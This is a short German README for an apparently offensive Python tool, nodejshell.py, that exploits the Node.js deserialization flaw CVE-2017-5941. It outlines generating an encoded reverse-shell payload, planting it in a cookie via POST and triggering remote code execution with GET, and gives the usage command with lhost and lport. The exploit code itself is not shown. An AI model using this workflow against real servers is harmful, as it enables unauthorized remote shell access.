
Exploit für eine Reverse-Shell zur Deserialisierung in NodeJs (CVE-2017-5941)
Der Exploit generiert automatisch das Reverse-Shell-Payload, das zuerst in Dezimal und dann in Base64 kodiert wird. Danach wird dieses Payload über eine HTTP-POST-Anfrage gesendet, die die Benutzereingabe serialisiert und in einem Cookie speichert. So erhalten wir den RCE, indem wir über eine GET-Anfrage darauf zugreifen.
Verwendung:
python3 nodejshell.py <lhost> <lport>
lhost: Ihre lokale IP-Adresse lport: der Port, mit dem Sie Ihre Reverse Shell verbinden möchten
Danach müssen Sie nur noch einige einfache Angaben machen:
Danach einfach Ihren bevorzugten Listener aktivieren und auf die Verbindung warten.
